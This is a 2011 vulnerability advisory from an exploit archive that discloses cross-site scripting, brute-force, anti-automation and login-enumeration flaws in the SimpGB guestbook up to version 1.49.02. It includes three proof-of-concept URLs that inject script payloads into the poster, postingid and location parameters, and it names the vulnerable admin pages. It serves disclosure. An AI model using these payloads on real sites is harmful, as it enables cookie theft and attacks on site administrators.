SimpGB 1.49.02 Cross Site Scripting

SimpGB 1.49.02 Cross Site Scripting: Posted Jan 26, 2011; Authored by MustLive; SimpGB versions 1.49.02 and below suffer from cross site scripting, brute force, insufficient anti-automation, and abuse of functionality vulnerabilities.; tags | exploit, vulnerability, xss; SHA-256 | 9cb4976c249efe8db919a1b089f43b558fc4fcc89e16276cf184713fa3db6958; Download | Favorite | View

SimpGB 1.49.02 Cross Site Scripting

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

Vulnerable are SimpGB v1.49.02 and previous versions.

----------
Details:
----------

XSS (WASC-08):

POST request at page http://site/guestbook.php in parameters poster,
postingid and location in Preview function. If captcha is using in
guestbook, then working code of the captcha is required for the attack. Or
via GET request:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection from automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 90 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

SimpGB 1.49.02 Cross Site Scripting

SimpGB 1.49.02 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SimpGB 1.49.02 Cross Site Scripting

Share This

SimpGB 1.49.02 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems